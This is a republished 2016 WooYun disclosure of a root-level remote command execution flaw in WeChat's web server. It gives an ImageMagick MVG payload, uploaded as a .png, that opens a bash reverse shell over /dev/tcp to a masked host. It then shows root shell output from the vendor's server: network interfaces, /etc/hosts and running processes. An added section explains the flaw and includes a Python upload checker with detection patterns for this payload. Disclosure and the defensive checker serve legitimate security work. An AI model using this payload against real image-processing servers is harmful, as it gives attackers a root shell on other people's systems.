Remote command execution vulnerability on the WeChat Web server


Vulnerability details

Disclosure status:

2016-05-05: Details reported to the vendor; awaiting vendor action
2016-05-10: Vendor confirmed; details disclosed to the vendor only
2016-05-20: Details disclosed to core white hats and relevant domain experts
2016-05-30: Details disclosed to regular white hats
2016-06-09: Details disclosed to intern white hats
2016-06-24: Details disclosed to the public

Brief description:

Remote command execution vulnerability on the WeChat Web server, root privileges, heh.

Detailed description:

#1 Vulnerable server address

https://wx2.qq.com/

#2 Send an image in a chat with yourself

wx.png



#3 Payload

Code:
push graphic-context 
viewbox 0 0 640 480
fill 'url(https://"|/bin/bash -i >& /dev/tcp/*.*.*.*/8080 0>&1")'
pop graphic-context

 

Proof of vulnerability:

#4 Obtain a remote shell

Code:
[email protected]*.*:~# /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr *.**.**.*
inet addr:223.167.*.* Bcast:223.167.*.* Mask:255.255.255.128
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:207675290974 errors:0 dropped:0 overruns:0 frame:0
TX packets:381824340869 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:64553957542020 (61563451.3 Mb) TX bytes:484719339307282 (462264384.5 Mb)

eth1 Link encap:Ethernet HWaddr *.**.**.**.*
inet addr:10.54.*.* Bcast:10.54.*.* Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:79387181028 errors:0 dropped:0 overruns:0 frame:0
TX packets:233634377039 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:604955868080734 (576930873.9 Mb) TX bytes:262973934281267 (250791487.0 Mb)

ip6tnl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1460 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:532406147 errors:0 dropped:0 overruns:0 frame:0
TX packets:532406147 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:14164026742798 (13507868.5 Mb) TX bytes:14164026742798 (13507868.5 Mb)

sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

tunl0 Link encap:IPIP Tunnel HWaddr
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

[email protected]*.*:~# cat /etc/hosts
#
# hosts This file describes a number of hostname-to-address
# mappings for the TCP/IP subsystem. It is mostly
# used at boot time, when no name servers are running.
# On small systems, this file can be used instead of a
# "named" name server.
# Syntax:
#
# IP-Address Full-Qualified-Hostname Short-Hostname
#

127.0.0.1 Tencent64.site Tencent64 localhost

# special IPv6 addresses



Code:
root      4307     1  0 Apr08 ?        00:00:27 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.conf
root 4323 1 0 Apr08 ? 00:00:03 /usr/local/agenttools/agent/agentPlugInD
root 4341 1 0 Apr08 ? 01:37:02 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.conf
root 4350 1 0 Apr08 ? 00:00:49 /usr/local/agenttools/agent/tcvmstat
root 4449 1 0 Apr08 ? 00:01:49 /usr/local/agenttools/agent/sysddd
root 6234 2 0 Jan18 ? 00:19:57 [flush-8:0]
root 6664 1 0 Jan20 ? 00:00:07 nws-watchdog
root 6665 6664 0 Jan20 ? 07:37:33 nws:http.so,worker_0-2
root 6692 2 0 Jan18 ? 00:04:48 [kjournald]
root 6693 2 0 Jan18 ? 00:05:46 [kjournald]
100 7321 1 0 Jan18 ? 00:00:05 /usr/bin/dbus-daemon --system
root 7341 1 0 Jan18 ? 00:00:01 /usr/sbin/hald --daemon=yes --retain-privileges
root 7682 1 0 15:37 ? 00:00:00 /bin/sh /usr/local/sa/agent/watchdog.sh
root 8028 1 0 15:37 ? 00:00:18 /usr/local/sa/agent/secu-tcs-agent
root 8036 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd -f /etc/ssh2/sshd2_config.l
root 8045 1 0 Jan18 ? 00:00:00 /usr/local/sbin/sshd

 

Remediation:

# Patch

Copyright notice: when reposting, please credit the source: 猪猪侠@乌云
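The payload in step #3 is a text-format MVG drawing sent under a .png name: the server-side image library parses it by content rather than extension and passes the url() target to a shell-invoked delegate, which is where the injected command runs. As an added example (not from the original report or the vendor's fix), the Python check below applies the two standard server-side defenses before an upload reaches the image library: verify that the file's magic bytes match the claimed extension, and reject text-based MVG/SVG content and url() references containing shell metacharacters. The function name, allow-list and samples are my own assumptions; the sample payload keeps the report's masked callback address.

```python
import re

# Magic bytes a genuine file of each allowed extension must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Text-based inputs an image uploader has no reason to accept (MVG/SVG),
# plus the delegate-injection shape used in the report: a url(...) whose
# target carries quotes, pipes or other shell metacharacters.
MVG_HINTS = (b"push graphic-context", b"viewbox", b"<svg")
INJECTION = re.compile(rb"url\s*\([^)]*[\"'|;`$&]", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> list[str]:
    """Return findings for an uploaded file; an empty list means it looks sane."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    magics = MAGIC.get(ext)
    if magics is None:
        findings.append(f"extension '{ext}' not in allow-list")
    elif not data.startswith(magics):
        findings.append(f"content does not match magic bytes for .{ext}")
    head = data[:4096].lower()
    if any(hint in head for hint in MVG_HINTS):
        findings.append("text-based MVG/SVG content in an image upload")
    if INJECTION.search(head):
        findings.append("url() reference with shell metacharacters (delegate injection)")
    return findings


# Constructed sample: the report's MVG payload uploaded under a .png name.
PAYLOAD = (b"push graphic-context\n"
           b"viewbox 0 0 640 480\n"
           b"fill 'url(https://\"|/bin/bash -i >& /dev/tcp/*.*.*.*/8080 0>&1\")'\n"
           b"pop graphic-context\n")
# Constructed sample: the opening bytes of a genuine PNG (signature + IHDR header).
REAL_PNG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 17

if __name__ == "__main__":
    for name, blob in (("wx.png", PAYLOAD), ("wx.png", REAL_PNG)):
        print(name, "->", check_upload(name, blob) or "ok")
```

A real deployment would combine this with the image library's own policy file to disable the text coders outright; the check above only stops the file before it is handed over.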


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-05-10 10:29

Vendor reply:

Thank you very much for your report. This is an issue in the IM component; a white hat had already reported it on the TSRC platform, and we handled it urgently at the first opportunity. Thank you all for your attention to the security of Tencent's services. If you have any questions, feel free to give feedback.

Latest status:

None yet


Link to this article: Remote command execution vulnerability on the WeChat Web server - https://www.15qq.cn/wooyun/602.html
